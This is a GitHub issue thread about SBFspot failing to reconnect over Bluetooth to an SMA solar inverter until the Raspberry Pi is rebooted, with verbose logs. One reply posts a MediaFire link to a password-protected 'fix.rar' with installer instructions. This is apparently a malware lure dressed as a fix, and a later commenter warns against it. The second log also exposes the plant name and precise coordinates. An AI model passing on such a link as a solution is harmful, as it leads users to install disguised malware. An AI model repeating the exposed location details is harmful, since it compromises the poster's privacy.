SBFspot/SBFspot #708: Problem after some days of usage, connot connect via BT

odin568, 2024-08-26:
Hi, 
In general, sbfspot is running fine with my Bluetooth inverter.
I have a RaspberryPi 3B+ with only Raspbian and SBFSpot installed with installer.

Just after some days, it stops working as it cannot connect via Bluetooth anymore. 

```bash
./SBFspot -d5 -v5 -ad1 -nosql -nocsv
SBFspot V3.9.11
Yet another tool to read power production of SMA solar inverters
(c) 2012-2024, SBF (https://github.com/SBFspot/SBFspot)
Compiled for Linux (LE) 64 bit with SQLite support
Commandline Args: -d5 -v5 -ad1 -nosql -nocsv
Reading config '/usr/local/bin/sbfspot.3/SBFspot.cfg'

Configuration settings:
BTAddress=00:80:25:20:C8:EF
MIS_Enabled=0
BTConnectRetries=10
Password=<undisclosed>
Plantname=XXXXXX
OutputPath=/home/raspi/smadata/%Y
OutputPathEvents=/home/raspi/smadata/%Y/Events
Latitude=49.XXXX
Longitude=10.XXXX
Timezone=Europe/Berlin
Locale=de-DE
CalculateMissingSpotValues=0
DateTimeFormat=%d/%m/%Y %H:%M:%S
DateFormat=%d/%m/%Y
TimeFormat=%H:%M:%S
SynchTime=7
SynchTimeLow=60
SynchTimeHigh=3600
SunRSOffset=900
DecimalPoint=comma
CSV_Delimiter=semicolon
Precision=3
CSV_Export=0
CSV_ExtendedHeader=1
CSV_Header=1
CSV_SaveZeroPower=1
CSV_Spot_TimeSource=0
CSV_Spot_WebboxHeader=0
SQL_Database=/home/raspi/smadata/SBFspot.db
End of Config

Mon Aug 26 20:06:38 2024: INFO: Starting...
sunrise: 06:26
sunset : 20:12
Connecting to 00:80:25:20:C8:EF (1/10)
Connecting to 00:80:25:20:C8:EF (2/10)
Connecting to 00:80:25:20:C8:EF (3/10)
Connecting to 00:80:25:20:C8:EF (4/10)
Connecting to 00:80:25:20:C8:EF (5/10)
Connecting to 00:80:25:20:C8:EF (6/10)
Connecting to 00:80:25:20:C8:EF (7/10)
Connecting to 00:80:25:20:C8:EF (8/10)
Connecting to 00:80:25:20:C8:EF (9/10)
Connecting to 00:80:25:20:C8:EF (10/10)
Mon Aug 26 20:07:38 2024: CRITICAL: bthConnect() returned -1
Mon Aug 26 20:07:38 2024: INFO: Done.
```

Once it recovered after a day automatically, now as I was on vacation and it didn't recover over a week.
Just did the above logs with maximum log output (hope I did right).

Then did  a reboot and then it works again fine:

```bash
raspi@raspi-sbfspot:/usr/local/bin/sbfspot.3 $ sudo reboot

Broadcast message from root@raspi-sbfspot on pts/1 (Mon 2024-08-26 20:08:01 CEST):

The system will reboot now!

raspi@raspi-sbfspot:/usr/local/bin/sbfspot.3 $ Connection to 192.168.0.202 closed by remote host.
Connection to 192.168.0.202 closed.
markus@markus-desktop:~$ ssh raspi@192.168.0.202
raspi@192.168.0.202's password: 
Linux raspi-sbfspot 6.6.20+rpt-rpi-v8 #1 SMP PREEMPT Debian 1:6.6.20-1+rpt1 (2024-03-07) aarch64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug 26 20:03:48 2024 from 192.168.0.120
raspi@raspi-sbfspot:~ $ ./SBFspot -d5 -v5 -ad1 -nosql -nocsv
-bash: ./SBFspot: No such file or directory
raspi@raspi-sbfspot:~ $ cd /usr/local/bin/sbfspot.3/
raspi@raspi-sbfspot:/usr/local/bin/sbfspot.3 $ ./SBFspot -d5 -v5 -ad1 -nosql -nocsv
SBFspot V3.9.11
Yet another tool to read power production of SMA solar inverters
(c) 2012-2024, SBF (https://github.com/SBFspot/SBFspot)
Compiled for Linux (LE) 64 bit with SQLite support
Commandline Args: -d5 -v5 -ad1 -nosql -nocsv
Reading config '/usr/local/bin/sbfspot.3/SBFspot.cfg'

Configuration settings:
BTAddress=00:80:25:20:C8:EF
MIS_Enabled=0
BTConnectRetries=10
Password=<undisclosed>
Plantname=Zellner
OutputPath=/home/raspi/smadata/%Y
OutputPathEvents=/home/raspi/smadata/%Y/Events
Latitude=49.6235
Longitude=10.5379
Timezone=Europe/Berlin
Locale=de-DE
CalculateMissingSpotValues=0
DateTimeFormat=%d/%m/%Y %H:%M:%S
DateFormat=%d/%m/%Y
TimeFormat=%H:%M:%S
SynchTime=7
SynchTimeLow=60
SynchTimeHigh=3600
SunRSOffset=900
DecimalPoint=comma
CSV_Delimiter=semicolon
Precision=3
CSV_Export=0
CSV_ExtendedHeader=1
CSV_Header=1
CSV_SaveZeroPower=1
CSV_Spot_TimeSource=0
CSV_Spot_WebboxHeader=0
SQL_Database=/home/raspi/smadata/SBFspot.db
End of Config

Mon Aug 26 20:10:35 2024: INFO: Starting...
sunrise: 06:26
sunset : 20:12
Connecting to 00:80:25:20:C8:EF (1/10)
Initialising...
SUSyID: 125 - SessionID: 921912661
getPacket(2)
MAX_CommBuf is now 18 bytes
Received 18 bytes
Received 13 bytes
cmd=2
...
```
Of course I can schedule a reboot via cron in the night but how can this happen? There is no other connection to the Inverter at all.
If you miss any information, please comment, I will add.

In general thanks for your awesome work :)

MinecraftEarthVillage, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

stripwax, 2024-08-26:
Don't download and install that.
If the person posting the link provides no references and the link looks
suspicious, that's because it is.